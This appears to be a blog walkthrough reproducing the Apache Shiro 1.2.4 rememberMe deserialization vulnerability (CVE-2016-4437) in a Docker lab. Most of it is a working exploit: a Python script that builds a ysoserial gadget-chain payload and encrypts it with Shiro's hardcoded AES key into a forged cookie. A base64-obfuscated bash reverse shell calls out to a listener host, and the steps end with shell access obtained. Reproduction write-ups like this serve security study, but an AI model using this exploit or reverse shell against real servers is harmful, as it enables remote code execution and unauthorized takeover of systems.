Shiro RememberMe 1.2.4 Deserialization Vulnerability (Shiro-550, CVE-2016-4437) Reproduction
Preface
For the next while I am going to work on vulnerability reproduction and code auditing; call it a small goal.
Getting started
Environment setup
Reproduced with docker
Start docker
systemctl start docker
Pull the image and start the environment
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 81:8080 medicean/vulapps:s_shiro_1
Because apache already occupies port 80 on this CentOS host, port 81 is used here; change it as you like.
Tool preparation
1. shiro_poc.py
# pip install pycrypto  (pycryptodome also provides the Crypto package)
import sys
import base64
import uuid
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    # Let ysoserial produce the serialized CommonsCollections2 gadget chain for `command`
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7 padding up to a multiple of the AES block size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # Hardcoded AES key shipped in Shiro 1.2.4
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes  # random 16-byte IV
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    # rememberMe cookie layout: base64(iv || AES-CBC ciphertext)
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)
Put this script in the /tmp directory.
2. The ysoserial jar file
Install git
apt-get install git
Install maven
wget https://downloads.apache.org/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
cd /usr/local
tar -zxvf apache-maven-3.6.3-bin.tar.gz
vi /etc/profile
export MAVEN_HOME=/usr/local/apache-maven-3.6.3
export PATH=$MAVEN_HOME/bin:$PATH
source /etc/profile
mvn -v
Edit /usr/local/apache-maven-3.6.3/conf/settings.xml, find the mirrors node and add the Aliyun mirror repository address:
<mirrors>
  <mirror>
    <id>alimaven</id>
    <name>aliyun maven</name>
    <url>http://maven.aliyun.com/nexus/content/groups/public/</url>
    <mirrorOf>central</mirrorOf>
  </mirror>
</mirrors>
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests
cp target/ysoserial-0.0.6-SNAPSHOT-all.jar /tmp
Install the Python module
pip3 install pycrypto
Running the exploit
The command to execute:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx}|{base64,-d}|{bash,-i}
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx is the base64 encoding of bash -i >& /dev/tcp/192.168.164.135/2345 0>&1
Start the listener
nc -lvvp 2345
python3 shiro_poc.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx}|{base64,-d}|{bash,-i}"
payload.cookie will then be found under /tmp.
Open the site in the browser, log in, click account page and capture the request.
Replace the entire Cookie content with the content of payload.cookie.
Go back to the listener and check.
Access has been obtained.
References
https://paper.seebug.org/shiro-rememberme-1-2-4/#0x01
https://www.cnblogs.com/paperpen/p/11312671.html
https://www.cnblogs.com/tr1ple/p/11662193.html